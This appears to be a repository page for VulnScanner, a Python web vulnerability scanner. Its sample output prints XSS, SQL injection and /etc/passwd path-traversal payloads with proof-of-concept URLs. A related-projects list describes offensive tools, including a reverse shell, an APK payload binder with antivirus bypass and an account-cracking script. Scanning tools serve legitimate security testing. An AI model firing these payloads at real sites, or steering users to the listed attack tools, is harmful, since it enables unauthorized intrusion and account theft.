Vuln Scanner With Python

Overview

VulnScanner

Code

Version Language GitHub Repo stars


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

SQL injection time based test.

SQL injection error based test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


How To Run

git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py http://example.com/page.php?cat=1

Example of Output

python3 vulnscan.py http://example.com/page.php?cat=1

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Discaimer

Usage of the VulnScanner for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.

Find me on

Facebook Telegram

Visit my Blog Site

  • Blogs
  • Owner
    < / N u l l S 0 U L >
    Use your brain , Make GOOGLE your friend 😘
    < / N u l l S 0 U L >
    Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

    Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

    lfama 8 Feb 27, 2022
    Signatures and IoCs from public Volexity blog posts.

    threat-intel This repository contains IoCs related to Volexity public threat intelligence blog posts. They are organised by year, and within each year

    Volexity 130 Dec 29, 2022
    A collection of over 5.1 million sub-domains and assets belonging to public bug bounty programs, compiled into a repo, for performing bulk operations.

    📂 Public Bug Bounty Targets Data By BugBountyResources A collection of over 5.1M sub-domains and assets belonging to bug bounty targets, all put in a

    Bug Bounty Resources 87 Dec 13, 2022
    This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things.

    Fuzzing PDFs like its 1990s This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things. Some discl

    Chaithu 14 Sep 30, 2022
    proxyshell payload generate

    Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

    Evi1cg 63 Nov 15, 2022
    Script Crack Facebook Elite 🚶‍♂

    elite Script Crack Facebook Elite 🚶‍♂ Install Script $ pkg update && pkg upgrade $ termux-setup-storage $ pkg install git $ pkg install python $ pip

    Yumasaa 1 Jan 02, 2022
    CVE-2022-22965 : about spring core rce

    CVE-2022-22965: Spring-Core-Rce EXP 特性: 漏洞探测(不写入 webshell,简单字符串输出) 自定义写入 webshell 文件名称及路径 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件 支持写入 冰蝎 webshell 代理支持,可

    东方有鱼名为咸 53 Nov 09, 2022
    domato but as a website

    ROFL-FUZZER Ths is Domato, a DOM Fuzzer from Google, but hosted as an website It generates a instance of a newtab on the template given by the user ,

    Swapnadeep Som 18 Nov 22, 2021
    Mass Shortlink Bypass Merupakan Tools Yang Akan Bypass Shortlink Ke Tujuan Asli, Dibuat Dengan Python 3

    Shortlink-Bypass Mass Shortlink Bypass Merupakan Tools Yang Akan Bypass Shortlink Ke Tujuan Asli, Dibuat Dengan Python 3 Support Shortlink tii.ai/tei.

    Wan Naz ID 6 Oct 24, 2022
    A small utility to deal with malware embedded hashes.

    Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

    Abdallah Elshinbary 48 Dec 19, 2022
    An advanced multi-threaded, multi-client python reverse shell for hacking linux systems

    PwnLnX An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There's still more work to do so feel free to help out

    0xTRAW 212 Dec 24, 2022
    Now patched 0day for force reseting an accounts password

    Animal Jam 0day No-Auth Force Password Reset via API Now patched 0day for force reseting an accounts password Used until patched to cause anarchy. Pro

    IRIS 10 Nov 17, 2022
    PassLock is a medium-security password manager that encrypts passwords using Advanced Encryption Standards (AES)

    A medium security python password manager that encrypt passwords using Advanced Encryption Standard (AES) PassLock is a password manager and password

    Akshay Vs 44 Nov 18, 2022
    This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

    webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

    Podalirius 396 Jan 08, 2023
    A toolkit for web reconnaissance, it's fast and easy to use.

    A toolkit for web reconnaissance, it's fast and easy to use. File Structure httpsuite/ main.py init.py db/ db.py init.py subdomains_db directories_db

    whoami security 22 Jul 22, 2022
    A (completely native) python3 wifi brute-force attack using the 100k most common passwords (2021)

    wifi-bf [LINUX ONLY] A (completely native) python3 wifi brute-force attack using the 100k most common passwords (2021) This script is purely for educa

    Finn Lancaster 20 Nov 12, 2022
    MayorSec DNS Enumeration Tool

    MayorSecDNSScan MSDNSScan is used to identify DNS records for target domains and check for zone transfers. There really isn't much special about it, a

    Joe Helle 68 Dec 12, 2022
    BloodyAD is an Active Directory Privilege Escalation Framework

    BloodyAD Framework BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combi

    757 Jan 07, 2023
    The ultimate Metasploit apk binder with legit apk written in python3

    Infector is a python3 based script which is officially made for linux based distro . It binds metasploit payload with original apk with avast antivirus bypassed .

    27 Dec 25, 2022
    Web-eyes - OSINT tools for website research

    WEB-EYES V1.0 web-eyes: OSINT tools for website research, 14 research methods ar

    8 Nov 10, 2022